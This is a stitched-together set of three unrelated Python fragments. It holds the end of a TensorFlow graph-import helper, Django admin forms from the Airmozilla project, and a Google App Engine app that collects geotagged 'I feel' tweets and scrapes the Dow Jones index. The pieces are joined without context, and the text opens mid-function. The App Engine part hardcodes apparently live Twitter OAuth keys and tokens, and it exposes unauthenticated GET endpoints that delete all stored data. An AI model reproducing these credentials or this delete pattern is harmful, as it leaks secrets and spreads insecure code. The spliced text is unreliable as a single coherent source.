importer.import_graph_def(graph_def, name="")
wrapped_import = wrap_function(_imports_graph_def, [])
import_graph = wrapped_import.graph
return wrapped_import.prune(
nest.map_structure(import_graph.as_graph_element, inputs),
nest.map_structure(import_graph.as_graph_element, outputs))
| |
import re
import datetime
from collections import defaultdict
import dateutil.parser
import pytz
from django import forms
from django.db.models import Count
from django.conf import settings
from django.contrib.auth.models import User, Group
from django.utils.timezone import utc
from django.utils.safestring import mark_safe
from django.core.urlresolvers import reverse
from slugify import slugify
from airmozilla.base.forms import BaseModelForm, BaseForm
from airmozilla.manage import url_transformer
from airmozilla.main.models import (
Approval,
Event,
EventTweet,
Location,
Region,
Tag,
Template,
Channel,
SuggestedEvent,
SuggestedEventComment,
URLMatch,
EventAssignment,
LocationDefaultEnvironment,
RecruitmentMessage,
Picture,
Topic,
Chapter,
)
from airmozilla.comments.models import Discussion, Comment
from airmozilla.surveys.models import Question, Survey
from airmozilla.staticpages.models import StaticPage
from airmozilla.base.helpers import show_duration_compact
from .widgets import PictureWidget
TIMEZONE_CHOICES = [(tz, tz.replace('_', ' ')) for tz in pytz.common_timezones]
ONE_HOUR = 60 * 60
class UserEditForm(BaseModelForm):
class Meta:
model = User
fields = ('is_active', 'is_staff', 'is_superuser', 'groups')
def clean(self):
cleaned_data = super(UserEditForm, self).clean()
is_active = cleaned_data.get('is_active')
is_staff = cleaned_data.get('is_staff')
is_superuser = cleaned_data.get('is_superuser')
groups = cleaned_data.get('groups')
if is_superuser and not is_staff:
raise forms.ValidationError('Superusers must be staff.')
if is_staff and not is_active:
raise forms.ValidationError('Staff must be active.')
if is_staff and not is_superuser and not groups:
raise forms.ValidationError(
'Non-superuser staff must belong to a group.'
)
return cleaned_data
class GroupEditForm(BaseModelForm):
def __init__(self, *args, **kwargs):
super(GroupEditForm, self).__init__(*args, **kwargs)
self.fields['name'].required = True
choices = self.fields['permissions'].choices
self.fields['permissions'] = forms.MultipleChoiceField(
choices=choices,
widget=forms.CheckboxSelectMultiple,
required=False
)
class Meta:
model = Group
fields = ('name', 'permissions')
class EventRequestForm(BaseModelForm):
tags = forms.CharField(required=False)
class Meta:
model = Event
widgets = {
'description': forms.Textarea(attrs={'rows': 4}),
'short_description': forms.Textarea(attrs={'rows': 2}),
'call_info': forms.Textarea(attrs={'rows': 3}),
'additional_links': forms.Textarea(attrs={'rows': 3}),
'template_environment': forms.Textarea(attrs={'rows': 3}),
'additional_links': forms.Textarea(attrs={'rows': 3}),
'remote_presenters': forms.Textarea(attrs={'rows': 3}),
'start_time': forms.DateTimeInput(format='%Y-%m-%d %H:%M'),
'estimated_duration': forms.widgets.Select(
choices=Event.ESTIMATED_DURATION_CHOICES
),
}
exclude = ('featured', 'status', 'archive_time', 'slug')
# Fields specified to enforce order
fields = (
'title', 'placeholder_img', 'picture',
'description',
'short_description', 'location', 'start_time',
'estimated_duration',
'channels', 'tags', 'call_info',
'remote_presenters',
'additional_links', 'privacy', 'popcorn_url'
)
def __init__(self, *args, **kwargs):
super(EventRequestForm, self).__init__(*args, **kwargs)
self.fields['channels'].help_text = (
'<a href="%s" class="btn btn-default" target="_blank">'
'<i class="glyphicon glyphicon-plus-sign"></i>'
'New channel'
'</a>' % reverse('manage:channel_new'))
self.fields['placeholder_img'].label = 'Placeholder image'
if 'instance' in kwargs:
event = kwargs['instance']
approvals = event.approval_set.all()
self.initial['approvals'] = [app.group for app in approvals]
if event.location:
self.fields['start_time'].help_text = (
'Time zone of this date is that of {0}.'.format(
event.location.timezone
)
)
# when the django forms present the start_time form field,
# it's going to first change it to UTC, then strftime it
self.initial['start_time'] = (
event.location_time.replace(tzinfo=utc)
)
else:
self.fields['start_time'].help_text = (
'Since there is no location, time zone of this date '
' is UTC.'
)
if event.pk:
tags_formatted = ','.join(x.name for x in event.tags.all())
self.initial['tags'] = tags_formatted
def clean_tags(self):
tags = self.cleaned_data['tags']
split_tags = [t.strip() for t in tags.split(',') if t.strip()]
final_tags = []
for tag_name in split_tags:
try:
t = Tag.objects.get(name=tag_name)
except Tag.DoesNotExist:
try:
t = Tag.objects.get(name__iexact=tag_name)
except Tag.DoesNotExist:
t = Tag.objects.create(name=tag_name)
final_tags.append(t)
return final_tags
def clean_slug(self):
"""Enforce unique slug across current slugs and old slugs."""
slug = self.cleaned_data['slug']
if Event.objects.filter(slug=slug).exclude(pk=self.instance.id):
raise forms.ValidationError('This slug is already in use.')
return slug
@staticmethod
def _check_staticpage_slug(slug):
if StaticPage.objects.filter(url__startswith='/%s' % slug).count():
raise forms.ValidationError(
"The default slug for event would clash with an existing "
"static page with the same URL. It might destroy existing "
"URLs that people depend on."
)
def clean(self):
data = super(EventRequestForm, self).clean()
if data.get('title') and not data.get('slug'):
# this means you have submitted a form without being explicit
# about what the slug will be
self._check_staticpage_slug(slugify(data.get('title')).lower())
elif data.get('slug'):
# are you trying to change it?
if self.instance.slug != data['slug']:
# apparently, you want to change to a new slug
self._check_staticpage_slug(data['slug'])
return data
class EventEditForm(EventRequestForm):
approvals = forms.ModelMultipleChoiceField(
queryset=Group.objects.filter(permissions__codename='change_approval'),
required=False,
widget=forms.CheckboxSelectMultiple()
)
curated_groups = forms.CharField(
required=False,
help_text='Curated groups only matter if the event is open to'
' "%s".' % [x[1] for x in Event.PRIVACY_CHOICES
if x[0] == Event.PRIVACY_CONTRIBUTORS][0]
)
class Meta(EventRequestForm.Meta):
exclude = ('archive_time',)
# Fields specified to enforce order
fields = (
'title', 'slug', 'status', 'privacy', 'curated_groups',
'featured', 'template',
'template_environment', 'placeholder_img', 'picture',
'location',
'description', 'short_description', 'start_time',
'estimated_duration',
'archive_time',
'channels', 'tags',
'call_info', 'additional_links', 'remote_presenters',
'approvals',
'popcorn_url',
'pin',
'recruitmentmessage',
)
def __init__(self, *args, **kwargs):
super(EventEditForm, self).__init__(*args, **kwargs)
if 'pin' in self.fields:
self.fields['pin'].help_text = (
"Use of pins is deprecated. Use Curated groups instead."
)
self.fields['popcorn_url'].label = 'Popcorn URL'
if 'recruitmentmessage' in self.fields:
self.fields['recruitmentmessage'].required = False
self.fields['recruitmentmessage'].label = 'Recruitment message'
self.fields['location'].queryset = (
Location.objects.filter(is_active=True).order_by('name')
)
if self.instance and self.instance.id:
# Checking for id because it might be an instance but never
# been saved before.
self.fields['picture'].widget = PictureWidget(self.instance)
# make the list of approval objects depend on requested approvals
# print Group.approval_set.filter(event=self.instance)
group_ids = [
x[0] for x in
Approval.objects
.filter(event=self.instance).values_list('group')
]
self.fields['approvals'].queryset = Group.objects.filter(
id__in=group_ids
)
# If the event has a duration, it doesn't make sense to
# show the estimated_duration widget.
if self.instance.duration:
del self.fields['estimated_duration']
elif self.initial.get('picture'):
self.fields['picture'].widget = PictureWidget(
Picture.objects.get(id=self.initial['picture']),
editable=False
)
else:
# too early to associate with a picture
del self.fields['picture']
def clean_pin(self):
value = self.cleaned_data['pin']
if value and len(value) < 4:
raise forms.ValidationError("Pin too short to be safe")
return value
def clean(self):
cleaned_data = super(EventEditForm, self).clean()
if not (
cleaned_data.get('placeholder_img') or cleaned_data.get('picture')
):
raise forms.ValidationError("Must have a placeholder or a Picture")
return cleaned_data
class EventExperiencedRequestForm(EventEditForm):
class Meta(EventEditForm.Meta):
exclude = ('featured', 'archive_time', 'slug')
# Fields specified to enforce order
fields = (
'title', 'status', 'privacy', 'template',
'template_environment', 'placeholder_img', 'picture',
'description',
'short_description', 'location', 'start_time',
'estimated_duration',
'channels', 'tags', 'call_info',
'additional_links', 'remote_presenters',
'approvals', 'pin', 'popcorn_url', 'recruitmentmessage'
)
class EventArchiveForm(BaseModelForm):
class Meta(EventRequestForm.Meta):
exclude = ()
fields = ('template', 'template_environment')
class EventArchiveTimeForm(BaseModelForm):
class Meta(EventRequestForm.Meta):
exclude = ()
fields = ('archive_time',)
def __init__(self, *args, **kwargs):
super(EventArchiveTimeForm, self).__init__(*args, **kwargs)
self.fields['archive_time'].help_text = (
"Input timezone is <b>UTC</b>"
)
if self.initial['archive_time']:
# Force it to a UTC string so Django doesn't convert it
# to a timezone-less string in the settings.TIME_ZONE timezone.
self.initial['archive_time'] = (
self.initial['archive_time'].strftime('%Y-%m-%d %H:%M:%S')
)
def clean_archive_time(self):
value = self.cleaned_data['archive_time']
# force it back to UTC
if value:
value = value.replace(tzinfo=utc)
return value
class EventTweetForm(BaseModelForm):
class Meta:
model = EventTweet
fields = (
'text',
'include_placeholder',
'send_date',
)
widgets = {
'text': forms.Textarea(attrs={
'autocomplete': 'off',
'data-maxlength': 140,
'rows': 2,
})
}
def __init__(self, event, *args, **kwargs):
super(EventTweetForm, self).__init__(*args, **kwargs)
self.fields['text'].help_text = (
'<b class="char-counter">140</b> characters left. '
'<span class="char-counter-warning"><b>Note!</b> Sometimes '
'Twitter can count it as longer than it appears if you '
'include a URL. '
'It\'s usually best to leave a little room.</span>'
)
# it's a NOT NULL field but it defaults to NOW()
# in the views code
self.fields['send_date'].required = False
if event.tags.all():
def pack_tags(tags):
return '[%s]' % (','.join('"%s"' % x for x in tags))
self.fields['text'].help_text += (
'<br><a href="#" class="include-event-tags" '
'data-tags=\'%s\'>include all event tags</a>'
% pack_tags([x.name for x in event.tags.all()])
)
if event.placeholder_img or event.picture:
from airmozilla.main.helpers import thumbnail
if event.picture:
pic = event.picture.file
else:
pic = event.placeholder_img
thumb = thumbnail(pic, '160x90', crop='center')
self.fields['include_placeholder'].help_text = (
'<img src="%(url)s" alt="placeholder" class="thumbnail" '
'width="%(width)s" width="%(height)s">' %
{
'url': thumb.url,
'width': thumb.width,
'height': thumb.height
}
)
else:
del self.fields['include_placeholder']
if event.location:
self.fields['send_date'].help_text = (
'Timezone is %s' % event.location.timezone
)
class ChannelForm(BaseModelForm):
class Meta:
model = Channel
exclude = ('created',)
def __init__(self, *args, **kwargs):
super(ChannelForm, self).__init__(*args, **kwargs)
self.fields['parent'].required = False
if kwargs.get('instance'):
self.fields['parent'].choices = [
(x, y) for (x, y)
in self.fields['parent'].choices
if x != kwargs['instance'].pk
]
self.fields['cover_art'].help_text = (
"The cover art for podcasts needs to be at least 1400x1400 "
"pixels. Smaller versions that are needed will be derived "
"from this same image."
)
def clean(self):
cleaned_data = super(ChannelForm, self).clean()
if 'always_show' in cleaned_data and 'never_show' in cleaned_data:
# if one is true, the other one can't be
if cleaned_data['always_show'] and cleaned_data['never_show']:
raise forms.ValidationError(
"Can't both be on always and never shown"
)
return cleaned_data
class TemplateEditForm(BaseModelForm):
class Meta:
model = Template
widgets = {
'content': forms.Textarea(attrs={'rows': 20})
}
fields = (
'name',
'content',
'default_popcorn_template',
'default_archive_template',
)
class TemplateMigrateForm(BaseForm):
template = forms.ModelChoiceField(
widget=forms.widgets.RadioSelect(),
queryset=Template.objects.all()
)
def __init__(self, *args, **kwargs):
self.instance = kwargs.pop('instance')
super(TemplateMigrateForm, self).__init__(*args, **kwargs)
scheduled = defaultdict(int)
removed = defaultdict(int)
events = Event.objects.all()
for each in events.values('template').annotate(Count('template')):
scheduled[each['template']] = each['template__count']
events = events.filter(status=Event.STATUS_REMOVED)
for each in events.values('template').annotate(Count('template')):
removed[each['template']] = each['template__count']
choices = [('', '---------')]
other_templates = Template.objects.exclude(id=self.instance.id)
for template in other_templates.order_by('name'):
choices.append((
template.id,
'{0} ({1} events, {2} removed)'.format(
template.name,
scheduled[template.id],
removed[template.id],
)
))
self.fields['template'].choices = choices
class RecruitmentMessageEditForm(BaseModelForm):
class Meta:
model = RecruitmentMessage
widgets = {
'notes': forms.Textarea(attrs={'rows': 3})
}
exclude = ('modified_user', 'created')
class EventChapterEditForm(BaseModelForm):
timestamp = forms.CharField(widget=forms.widgets.TextInput(
attrs={
'placeholder': 'For example: 22m0s'
}
))
class Meta:
model = Chapter
widgets = {
'text': forms.widgets.TextInput()
}
exclude = ('user', 'created', 'event')
def __init__(self, *args, **kwargs):
self.max_timestamp = None
if kwargs.get('instance'):
self.max_timestamp = kwargs['instance'].event.duration
if kwargs['instance'].timestamp:
kwargs['instance'].timestamp = show_duration_compact(
kwargs['instance'].timestamp
)
super(EventChapterEditForm, self).__init__(*args, **kwargs)
def clean_timestamp(self):
value = self.cleaned_data['timestamp'].strip().replace(' ', '')
hours = re.findall('(\d{1,2})h', value)
minutes = re.findall('(\d{1,2})m', value)
seconds = re.findall('(\d{1,2})s', value)
if seconds:
seconds = int(seconds[0])
else:
seconds = 0
if minutes:
minutes = int(minutes[0])
else:
minutes = 0
if hours:
hours = int(hours[0])
else:
hours = 0
total = seconds + minutes * 60 + hours * 60 * 60
if not total:
raise forms.ValidationError('Must be greater than zero')
if self.max_timestamp:
if total >= self.max_timestamp:
raise forms.ValidationError('Longer than video duration')
return total
class SurveyEditForm(BaseModelForm):
class Meta:
model = Survey
exclude = ('created', 'modified')
def __init__(self, *args, **kwargs):
super(SurveyEditForm, self).__init__(*args, **kwargs)
self.fields['active'].validators.append(self.validate_active)
self.fields['events'].required = False
self.fields['events'].queryset = (
self.fields['events'].queryset.order_by('title')
)
def validate_active(self, value):
if value and not self.instance.question_set.count():
raise forms.ValidationError(
"Survey must have at least one question in order to be active"
)
class SurveyNewForm(BaseModelForm):
class Meta:
model = Survey
fields = ('name', )
class LocationEditForm(BaseModelForm):
timezone = forms.ChoiceField(choices=TIMEZONE_CHOICES)
def __init__(self, *args, **kwargs):
super(LocationEditForm, self).__init__(*args, **kwargs)
if 'instance' in kwargs:
initial = kwargs['instance'].timezone
else:
initial = settings.TIME_ZONE
self.initial['timezone'] = initial
class Meta:
model = Location
fields = ('name', 'timezone', 'is_active', 'regions')
class LocationDefaultEnvironmentForm(BaseModelForm):
class Meta:
model = LocationDefaultEnvironment
fields = ('privacy', 'template', 'template_environment')
widgets = {
'template_environment': forms.widgets.Textarea()
}
class RegionEditForm(BaseModelForm):
class Meta:
model = Region
fields = ('name', 'is_active')
class TopicEditForm(BaseModelForm):
class Meta:
model = Topic
fields = ('topic', 'sort_order', 'groups', 'is_active')
def __init__(self, *args, **kwargs):
super(TopicEditForm, self).__init__(*args, **kwargs)
self.fields['topic'].widget = forms.widgets.TextInput(attrs={
'placeholder': 'for example Partners for Firefox OS'
})
class ApprovalForm(BaseModelForm):
class Meta:
model = Approval
fields = ('comment',)
widgets = {
'comment': forms.Textarea(attrs={'rows': 3})
}
class HeadersField(forms.CharField):
widget = forms.widgets.Textarea
def __init__(self, *args, **kwargs):
super(HeadersField, self).__init__(*args, **kwargs)
self.help_text = self.help_text or mark_safe(
"For example <code>Content-Type: text/xml</code>"
)
def to_python(self, value):
if not value:
return {}
headers = {}
for line in [x.strip() for x in value.splitlines() if x.strip()]:
try:
key, value = line.split(':', 1)
except ValueError:
raise forms.ValidationError(line)
headers[key.strip()] = value.strip()
return headers
def prepare_value(self, value):
if isinstance(value, basestring):
# already prepared
return value
elif value is None:
return ''
out = []
for key in sorted(value):
out.append('%s: %s' % (key, value[key]))
return '\n'.join(out)
def widget_attrs(self, widget):
attrs = super(HeadersField, self).widget_attrs(widget)
if 'rows' not in attrs:
attrs['rows'] = 3
return attrs
class StaticPageEditForm(BaseModelForm):
headers = HeadersField(required=False)
class Meta:
model = StaticPage
fields = (
'url',
'title',
'content',
'privacy',
'template_name',
'allow_querystring_variables',
'headers',
)
def __init__(self, *args, **kwargs):
super(StaticPageEditForm, self).__init__(*args, **kwargs)
self.fields['url'].label = 'URL'
self.fields['template_name'].label = 'Template'
choices = (
('', 'Default'),
('staticpages/nosidebar.html', 'Default (but no sidebar)'),
('staticpages/blank.html', 'Blank (no template wrapping)'),
)
self.fields['template_name'].widget = forms.widgets.Select(
choices=choices
)
def clean_url(self):
value = self.cleaned_data['url']
if value.startswith('sidebar'):
# expect it to be something like
# 'sidebar_bottom_how-tos'
try:
__, __, channel_slug = value.split('_', 2)
except ValueError:
raise forms.ValidationError(
"Must be format like `sidebar_bottom_channel-slug`"
)
try:
Channel.objects.get(slug=channel_slug)
except Channel.DoesNotExist:
raise forms.ValidationError(
"No channel slug found called `%s`" % channel_slug
)
return value
def clean(self):
cleaned_data = super(StaticPageEditForm, self).clean()
if 'url' in cleaned_data and 'privacy' in cleaned_data:
if cleaned_data['url'].startswith('sidebar_'):
if cleaned_data['privacy'] != Event.PRIVACY_PUBLIC:
raise forms.ValidationError(
"If a sidebar the privacy must be public"
)
return cleaned_data
class VidlyURLForm(forms.Form):
url = forms.CharField(
required=True,
label='URL',
widget=forms.widgets.TextInput(attrs={
'placeholder': 'E.g. http://videos.mozilla.org/.../file.flv',
'class': 'input-xxlarge',
})
)
token_protection = forms.BooleanField(required=False)
hd = forms.BooleanField(required=False, label='HD')
def __init__(self, *args, **kwargs):
disable_token_protection = kwargs.pop(
'disable_token_protection',
False
)
super(VidlyURLForm, self).__init__(*args, **kwargs)
if disable_token_protection:
self.fields['token_protection'].widget.attrs['disabled'] = (
'disabled'
)
self.fields['token_protection'].required = True
self.fields['token_protection'].help_text = (
'Required for non-public events'
)
def clean_url(self):
# annoyingly, we can't use forms.URLField since it barfs on
# Basic Auth urls. Instead, let's just make some basic validation
# here
value = self.cleaned_data['url']
if ' ' in value or '://' not in value:
raise forms.ValidationError('Not a valid URL')
value, error = url_transformer.run(value)
if error:
raise forms.ValidationError(error)
return value
class EventsAutocompleteForm(BaseForm):
q = forms.CharField(required=True, max_length=200)
max = forms.IntegerField(required=False, min_value=1, max_value=20)
class AcceptSuggestedEventForm(BaseModelForm):
class Meta:
model = SuggestedEvent
fields = ('review_comments',)
widgets = {
'review_comments': forms.Textarea(attrs={'rows': 3})
}
class TagEditForm(BaseModelForm):
class Meta:
model = Tag
fields = ('name',)
def clean_name(self):
value = self.cleaned_data['name']
other_tags = Tag.objects.filter(name__iexact=value)
if self.instance:
other_tags = other_tags.exclude(id=self.instance.id)
if other_tags.exists():
raise forms.ValidationError(
'Used by another tag. Consider merging.'
)
return value
class TagMergeRepeatedForm(BaseForm):
keep = forms.ChoiceField(
label='Name to keep',
widget=forms.widgets.RadioSelect()
)
def __init__(self, this_tag, *args, **kwargs):
super(TagMergeRepeatedForm, self).__init__(*args, **kwargs)
def describe_tag(tag):
count = Event.objects.filter(tags=tag).count()
if count == 1:
tmpl = '%s (%d time)'
else:
tmpl = '%s (%d times)'
return tmpl % (tag.name, count)
self.fields['keep'].choices = [
(x.id, describe_tag(x))
for x in Tag.objects.filter(name__iexact=this_tag.name)
]
class TagMergeForm(BaseForm):
name = forms.CharField()
def __init__(self, this_tag, *args, **kwargs):
super(TagMergeForm, self).__init__(*args, **kwargs)
self.this_tag = this_tag
def clean_name(self):
value = self.cleaned_data['name']
other_tags = (
Tag.objects
.filter(name__iexact=value)
.exclude(id=self.this_tag.id)
)
if not other_tags.exists():
raise forms.ValidationError('Not found')
return value
class VidlyResubmitForm(VidlyURLForm):
id = forms.IntegerField(widget=forms.widgets.HiddenInput())
class URLMatchForm(BaseModelForm):
class Meta:
model = URLMatch
exclude = ('use_count',)
def clean_name(self):
name = self.cleaned_data['name'].strip()
if URLMatch.objects.filter(name__iexact=name):
raise forms.ValidationError("URL matcher name already in use")
return name
def clean_string(self):
string = self.cleaned_data['string']
try:
re.compile(string)
except Exception as e:
raise forms.ValidationError(e)
return string
class SuggestedEventCommentForm(BaseModelForm):
class Meta:
model = SuggestedEventComment
fields = ('comment',)
widgets = {
'comment': forms.Textarea(attrs={'rows': 3})
}
class DiscussionForm(BaseModelForm):
class Meta:
model = Discussion
fields = ('enabled', 'closed', 'moderate_all', 'notify_all',
'moderators')
class CommentEditForm(BaseModelForm):
class Meta:
model = Comment
fields = ('status', 'comment', 'flagged')
class CommentsFilterForm(BaseForm):
user = forms.CharField(required=False)
comment = forms.CharField(required=False)
status = forms.ChoiceField(
required=False,
choices=(
(('', 'ALL'),) + Comment.STATUS_CHOICES + (('flagged', 'Flagged'),)
)
)
class CommentsFilterForm(CommentsFilterForm):
event = forms.CharField(required=False)
class EventAssignmentForm(BaseModelForm):
class Meta:
model = EventAssignment
fields = ('locations', 'users')
def __init__(self, *args, **kwargs):
super(EventAssignmentForm, self).__init__(*args, **kwargs)
users = (
User.objects
.extra(select={
'email_lower': 'LOWER(email)'
})
.filter(is_active=True, is_staff=True)
.order_by('email_lower')
)
def describe_user(user):
ret = user.email
if user.first_name or user.last_name:
name = (user.first_name + ' ' + user.last_name).strip()
ret += ' (%s)' % name
return ret
self.fields['users'].choices = [
(x.pk, describe_user(x)) for x in users
]
self.fields['users'].required = False
self.fields['users'].help_text = 'Start typing to find users.'
locations = (
Location.objects.filter(is_active=True)
.order_by('name')
)
if self.instance.event.location:
locations = locations.exclude(pk=self.instance.event.location.pk)
self.fields['locations'].choices = [
(x.pk, x.name) for x in locations
]
self.fields['locations'].required = False
self.fields['locations'].help_text = 'Start typing to find locations.'
class EventTranscriptForm(BaseModelForm):
class Meta:
model = Event
fields = ('transcript', )
class QuestionForm(BaseModelForm):
class Meta:
model = Question
fields = ('question',)
class EventSurveyForm(BaseForm):
survey = forms.ChoiceField(
widget=forms.widgets.RadioSelect()
)
def __init__(self, *args, **kwargs):
super(EventSurveyForm, self).__init__(*args, **kwargs)
def describe_survey(survey):
output = survey.name
if not survey.active:
output += ' (not active)'
count_questions = Question.objects.filter(survey=survey).count()
if count_questions == 1:
output += ' (1 question)'
else:
output += ' (%d questions)' % count_questions
return output
self.fields['survey'].choices = [
('0', 'none')
] + [
(x.id, describe_survey(x)) for x in Survey.objects.all()
]
class PictureForm(BaseModelForm):
class Meta:
model = Picture
fields = ('file', 'notes', 'default_placeholder', 'is_active')
help_texts = {
'is_active': (
"Only active pictures is a choice when users pick picture."
),
}
class AutocompeterUpdateForm(BaseForm):
verbose = forms.BooleanField(required=False)
max_ = forms.IntegerField(required=False)
all = forms.BooleanField(required=False)
flush_first = forms.BooleanField(required=False)
since = forms.IntegerField(
required=False,
help_text="Minutes since last modified"
)
def clean_since(self):
value = self.cleaned_data['since']
if value:
print "Minutes", int(value)
value = datetime.timedelta(minutes=int(value))
return value
class ISODateTimeField(forms.DateTimeField):
def strptime(self, value, __):
return dateutil.parser.parse(value)
class EventsDataForm(BaseForm):
since = ISODateTimeField(required=False)
class TriggerErrorForm(BaseForm):
message = forms.CharField()
capture_with_raven = forms.BooleanField(required=False)
class ReindexRelatedContentForm(BaseForm):
all = forms.BooleanField(required=False)
since = forms.IntegerField(
required=False,
help_text='minutes',
widget=forms.widgets.NumberInput(attrs={
'style': 'width: 200px',
})
)
delete_and_recreate = forms.BooleanField(required=False)
class RelatedContentTestingForm(BaseForm):
event = forms.CharField(
help_text="Title, slug or ID"
)
use_title = forms.BooleanField(required=False)
boost_title = forms.FloatField()
use_tags = forms.BooleanField(required=False)
boost_tags = forms.FloatField()
size = forms.IntegerField()
def clean_event(self):
event = self.cleaned_data['event'].strip()
try:
if not event.isdigit():
raise Event.DoesNotExist
return Event.objects.get(id=event)
except Event.DoesNotExist:
try:
return Event.objects.get(slug__iexact=event)
except Event.DoesNotExist:
try:
return Event.objects.get(title__iexact=event)
except Event.DoesNotExist:
raise forms.ValidationError("Event can't be found")
except Event.MultipleObjectsReturned:
raise forms.ValidationError(
'Event title ambiguous. Use slug or ID.'
)
def clean(self):
cleaned_data = super(RelatedContentTestingForm, self).clean()
if 'use_title' in cleaned_data and 'use_tags' in cleaned_data:
if not (cleaned_data['use_title'] or cleaned_data['use_tags']):
raise forms.ValidationError(
'One of Use title OR Use tags must be chosen'
)
return cleaned_data
class EventDurationForm(BaseModelForm):
class Meta:
model = Event
fields = ('duration',)
def __init__(self, *args, **kwargs):
super(EventDurationForm, self).__init__(*args, **kwargs)
self.fields['duration'].required = False
self.fields['duration'].help_text = (
"Note! If you remove this value (make it blank), it will be "
"unset and automatically be re-evaluated."
)
| |
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# GAE stuff
import os
import urllib
from google.appengine.api import users
from google.appengine.ext import ndb
import jinja2
import webapp2
import logging
import json
JINJA_ENVIRONMENT = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.join(os.path.dirname(__file__), "templates"))
)
GEO_LIST = [
["LA","34.002854,-118.110295,100mi"],
["NYC","40.767024,-73.973884,100mi"],
["CHI","41.849591,-87.690270,100mi"],
["ATL","33.759293,-84.387817,100mi"]
]
Q_TERMS = ["i feel","i am feeling","i'm feeling","i dont feel","i'm","Im","I am","makes me"]
GEO_DICT = dict(zip(map(lambda x: x[0], GEO_LIST),map(lambda x: x[1], GEO_LIST)))
class Tweet(ndb.Model):
searchTerm = ndb.StringProperty()
searchGeo = ndb.StringProperty()
searchGeoPlace = ndb.StringProperty()
processed = ndb.BooleanProperty(default=False)
timestamp = ndb.DateTimeProperty(auto_now_add=True)
id = ndb.IntegerProperty()
text = ndb.StringProperty()
created_at = ndb.DateTimeProperty()
geo = ndb.StringProperty()
favorite_count = ndb.IntegerProperty()
retweet_count = ndb.IntegerProperty()
class DJI(ndb.Model):
dji = ndb.FloatProperty()
timestamp = ndb.DateTimeProperty(auto_now_add=True)
import tweepy
CONSUMER_KEY = '63c0lXM51rxZ2cZUr3QcKKR9q'
CONSUMER_SECRET = 'Kxu44kTkweAkfAVtYVTe2y2Q8FdtkkKFPaMacyihRs1d9eRuU4'
ACCESS_TOKEN_KEY = '37201527-wnO8ILKImZ4SDzTNF3RNTQ9UMZV4oYeBF0t5lA2yU'
ACCESS_TOKEN_SECRET = 'QHkYL3Vk0E1sj4WPPe2EKb1KbEke0SuW3K0Y6Ag4N4GeS'
auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)
auth.set_access_token(ACCESS_TOKEN_KEY, ACCESS_TOKEN_SECRET)
api = tweepy.API(auth)
##########################################################################
def json_date_handler(obj):
# return obj.isoformat() if hasattr(obj, 'isoformat') else obj
import datetime
return obj.strftime("%Y-%m-%d %H:%M:%S") if isinstance(obj,datetime.datetime) else obj
class NDBStatsGeoHandler(webapp2.RequestHandler):
def get(self):
stats = []
for q in GEO_LIST:
cnt = Tweet.query(Tweet.searchGeo==q[1]).count()
stats.append({"q":q[0],"cnt":cnt})
self.response.out.write(json.dumps(stats,default=json_date_handler))
class NDBStatsHandler(webapp2.RequestHandler):
def get(self):
stats = []
for q in Q_TERMS:
cnt = Tweet.query(Tweet.searchTerm==q).count()
stats.append({"q":q,"cnt":cnt})
stats.append({"q":"TOTAL","cnt":Tweet.query().count()})
template_values = {
'arr':stats,
'dji_cnt':DJI.query().count()
}
template = JINJA_ENVIRONMENT.get_template('ndb_stats.html')
self.response.out.write(template.render(template_values))
class CronDummyHandler(webapp2.RequestHandler):
def get(self):
pass
class CronFetchTweetHandler(webapp2.RequestHandler):
def get(self):
cnt = 0
for city in GEO_LIST:
for q in Q_TERMS:
cnt += self.__get_tweet(q=q,geocode=city[1])
logging.info('CRON cron_fetch_tweet DONE - %d tweets'%(cnt,))
#self.response.out.write(str(cnt))
def __get_tweet(self,q='pizza',geocode="40.767024,-73.973884,100mi"):
if Tweet.query(Tweet.searchTerm==q).count() > 0:
since_id = Tweet.query(Tweet.searchTerm==q).order(-Tweet.id).fetch(1)[0].id
else:
since_id = 0
logging.info('__get_tweet: q=%s,geocode=%s,since_id=%d' % (q,geocode,since_id))
rst = api.search(q=q,geocode=geocode,since_id=since_id,count=100)
tws = []
for t in rst:
tweet = Tweet( searchTerm = q,
searchGeo = geocode,
id = t.id,
text = t.text,
created_at = t.created_at,
geo = str(t.geo),
favorite_count = t.favorite_count,
retweet_count = t.retweet_count
)
#tweet.put()
tws.append(tweet)
ndb.put_multi(tws)
return len(rst)
class CronFetchDJIHandler(webapp2.RequestHandler):
def get(self):
from HTMLParser import HTMLParser
class DJIHTMLParser(HTMLParser):
def __init__(self):
HTMLParser.__init__(self)
self.found = False
self.dji = 0
def handle_starttag(self, tag, attrs):
for a in attrs:
if a[0] == 'id' and a[1] == 'yfs_l10_^dji':
#print "n %s v %s" % (a[0],a[1])
self.found = True
def handle_data(self, data):
if self.found is True:
#print "Encountered some data :", data
self.dji = data
self.found = False
baseurl = "http://finance.yahoo.com/q/bc?s=%5EDJI+Basic+Chart"
htmlcontent = "".join(urllib.urlopen(baseurl))
parser = DJIHTMLParser()
parser.feed(htmlcontent)
dji_price = float(parser.dji.replace(',',''))
dj = DJI(dji = dji_price)
dj.put()
print dji_price
self.response.out.write(dji_price)
class NDBDeleteHandler(webapp2.RequestHandler):
def get(self):
q = self.request.get('q')
keys = Tweet.query(Tweet.searchTerm==q).fetch(keys_only=True)
# toDel = ndb.get_multi(keys)
# for d in toDel:
# print d.created_at
ndb.delete_multi(keys)
self.response.write(len(keys))
class NDBDeleteAllHandler(webapp2.RequestHandler):
def get(self):
cnt1 = Tweet.query().count()
cnt2 = DJI.query().count()
errorMsg = ""
while Tweet.query().count()>0 or DJI.query().count()>0:
try:
while Tweet.query().count() > 0:
keys = Tweet.query().fetch(2000,keys_only=True)
ndb.delete_multi(keys)
while DJI.query().count() > 0:
keys = DJI.query().fetch(2000,keys_only=True)
ndb.delete_multi(keys)
except Exception, e: #DeadlineExceededErrors
errorMsg = errorMsg + str(e)
msg = "deleted: %d Tweet objects, %d DJI objects." % (cnt1,cnt2)
self.response.write(msg + "</br></br></br>" + errorMsg)
class DJIJsonHandler(webapp2.RequestHandler):
def get(self):
import json
